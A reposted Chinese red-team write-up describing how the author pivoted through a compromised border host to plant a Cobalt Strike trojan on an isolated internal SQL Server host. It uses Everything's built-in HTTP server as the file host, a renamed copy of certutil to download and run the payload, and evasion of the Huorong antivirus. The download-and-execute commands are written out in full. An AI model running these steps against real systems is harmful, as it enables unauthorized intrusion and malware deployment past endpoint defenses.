记录某次内网渗透中everthing的妙用

admin 2023年11月5日23:39:41评论25 views字数 558阅读1分51秒阅读模式

场景:

获取到边界主机A权限,进行内网渗透时找到内网主机B的sqlserver账号密码

利用MDUT可成功执行命令

记录某次内网渗透中everthing的妙用

but,主机B不出网,无法直接上CS;无RDP密码,没法直接3389;存在火绒创建账号被拦截。

现在如何能让主机B上线到我们的CS呢?

其实方法有很多,这里我用的是通过中转监听,主机A作为跳板机,生成木马反连。

生成中转木马

记录某次内网渗透中everthing的妙用

这里监听器要把地址换成主机A和主机B互通那张网卡的ip地址

记录某次内网渗透中everthing的妙用

(图是后补的)

接着生成木马

记录某次内网渗透中everthing的妙用

生成之后简单做个免杀(hr还是很好过的)这里就要想办法扔到主机B里面

不过既然我们已经通过MDUT可以执行命令,把马下载下来只是小问题

刚好在边界A主机发现存在Everything软件

通过everything开启http服务,然后把木马放到边界机器上即可

记录某次内网渗透中everthing的妙用

记录某次内网渗透中everthing的妙用

记录某次内网渗透中everthing的妙用

在MDUT里执行

# 因为有个火绒,担心会拦截,所以这里进行了一下简单的绕过
copy C:WindowsSystem32certutil.exe cer.exe
cer -urlcache -split -f "http://192.168.10.1:81/C%3A/Windows/Temp/10.exe" 10.txt
rename 10.txt 10.exe

10.exe

图是后补的,请各位大佬自行脑补

记录某次内网渗透中everthing的妙用

记录某次内网渗透中everthing的妙用



原文始发于微信公众号(零威胁):记录某次内网渗透中everthing的妙用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月5日23:39:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记录某次内网渗透中everthing的妙用https://cn-sec.com/archives/2176783.html

发表评论

匿名网友 填写信息